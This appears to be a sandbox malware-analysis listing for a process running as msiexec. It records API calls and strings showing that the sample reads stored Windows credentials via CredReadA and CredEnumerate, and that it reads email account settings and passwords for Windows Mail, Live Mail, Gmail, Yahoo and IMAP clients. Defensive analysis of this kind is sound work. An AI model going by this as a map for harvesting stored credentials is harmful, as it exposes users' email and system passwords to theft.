                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                    • API String ID: 3259144588-3822380221
                                                                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                    APIs
                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                    • API String ID: 2449869053-4258758744
                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                    APIs
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • strlen.MSVCRT ref: 00443AD2
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                    • memset.MSVCRT ref: 00443B2E
                                                                    • memset.MSVCRT ref: 00443B4B
                                                                    • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                    • LocalFree.KERNEL32(?), ref: 00443C23
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                      • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                    Strings
                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                    • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                    • Salt, xrefs: 00443BA7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                    • API String ID: 4030136668-2687544566
                                                                    • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                    • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                    • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                    • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                    APIs
                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                    • strchr.MSVCRT ref: 004042F6
                                                                    • strlen.MSVCRT ref: 0040430A
                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                    • strchr.MSVCRT ref: 0040433C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                    • String ID: %s@gmail.com$www.google.com
                                                                    • API String ID: 3866421160-4070641962
                                                                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                    • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                    • memset.MSVCRT ref: 004097BD
                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                    • API String ID: 1035899707-3647959541
                                                                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                    APIs
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                    • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                    • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                      • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                      • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                      • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                    • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                    • SetCursor.USER32(00000000), ref: 0040CB35
                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                    • SetFocus.USER32(?), ref: 0040CB92
                                                                    • SetFocus.USER32(?), ref: 0040CC0B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                    • String ID:
                                                                    • API String ID: 1416211542-0
                                                                    • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                    • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                    • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                    • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                    • API String ID: 2360744853-2229823034
                                                                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                    APIs
                                                                    • strchr.MSVCRT ref: 004100E4
                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                    • memset.MSVCRT ref: 00410129
                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                    • memset.MSVCRT ref: 00410171
                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                    • String ID: \systemroot
                                                                    • API String ID: 912701516-1821301763
                                                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                    APIs
                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                    • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                    Strings
                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                    • API String ID: 1640410171-2022683286
                                                                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                    APIs
                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$strlen
                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                    • API String ID: 2619041689-3408036318
                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$strlen
                                                                    • String ID:
                                                                    • API String ID: 667451143-3916222277
                                                                    • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                    • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                    APIs
                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                    • memset.MSVCRT ref: 0040882A
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                    • String ID: J$Microsoft_WinInet
                                                                    • API String ID: 3318079752-260894208
                                                                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004037EB
                                                                    • memset.MSVCRT ref: 004037FF
                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    • strchr.MSVCRT ref: 0040386E
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                    • strlen.MSVCRT ref: 00403897
                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                    • String ID: %s@yahoo.com
                                                                    • API String ID: 2240714685-3288273942
                                                                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                    APIs
                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                    • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                    • API String ID: 888011440-2039793938
                                                                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                    APIs
                                                                    Strings
                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                    • out of memory, xrefs: 0042EBEF
                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                    • database is already attached, xrefs: 0042EA97
                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                    • API String ID: 1297977491-2001300268
                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                    APIs
                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                    • strchr.MSVCRT ref: 0040327B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringstrchr
                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                    • API String ID: 1348940319-1729847305
                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                    • API String ID: 3510742995-3273207271
                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F567
                                                                    • memset.MSVCRT ref: 0040F57F
                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
